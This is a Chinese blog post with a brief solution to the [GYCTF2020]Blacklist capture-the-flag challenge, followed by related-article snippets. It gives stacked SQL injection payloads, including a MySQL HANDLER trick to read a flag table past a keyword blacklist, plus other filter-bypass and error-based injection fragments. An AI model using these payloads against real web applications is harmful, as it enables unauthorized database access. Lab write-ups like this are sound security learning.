[GYCTF2020]Blacklist堆叠注入

最新推荐文章于 2023-01-19 12:48:40 发布
最新推荐文章于 2023-01-19 12:48:40 发布
阅读量3.3k 收藏 8
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/105785215
版权

[GYCTF2020]Blacklist

image.png

1';show columns from `FlagHere`; %23

查看列

image.png

image.png

过滤了这么多,比强网杯过滤更加严格了

这里我们用到handler这个东西

HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
浩歌已行
关注
堆叠注入之handler的使用
一只菜鸟呀的博客
05-23 129
堆叠注入中,我们可能会通过改表名来达到查询的目的。但是,一旦我们的关键字被过滤掉,堆叠注入也就不那么容易了。在MySQL中,有一种handler的查询方式,可以代替select语句(虽然并没有select强大,也并没有写到sql标准中),按照表中一行一行进行查询。
buuctf刷题
qq_41788704的博客
10-28 1998
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 815
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2374
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
[GYCTF2020]Blacklist 1
m0_62879498的博客
04-28 2516
[GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 单引号 只能使用 堆叠注入 来进行查询查寻 库名 表名 1';show databases-- q 库名:supersqli 在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错注入 来查询库名 1' and (extractvalue(1,c
[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1
bazzza的博客
12-23 306
blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入,接着使用order by判断字段,发现字段数为2,但在接一步的注入中,出现提示,遇到阻拦。 这个地方使用正则过滤了一些关键字,在尝试绕过的时候也失败了,但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名,然后再进行堆叠注入,(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract
-------已搬运------SQL注入的 过滤 思路 payload 万能密码
Zero_Adam的博客
04-28 1877
目录:一、过滤关键词:1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:3. `,`逗号被过滤了:1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`2.`limit 0,1` 用这个来代替:`limit 1 offset {}`二、一些小trick1. 关于bool盲注的正确与否三、一些payload:1. 过滤了 空格,但是可以联合查询的bool注
[GYCTF2020]Blacklist堆叠注入
最新发布
记录学习,一起进步
01-19 2021
[GYCTF2020]Blacklist堆叠注入
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 455
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值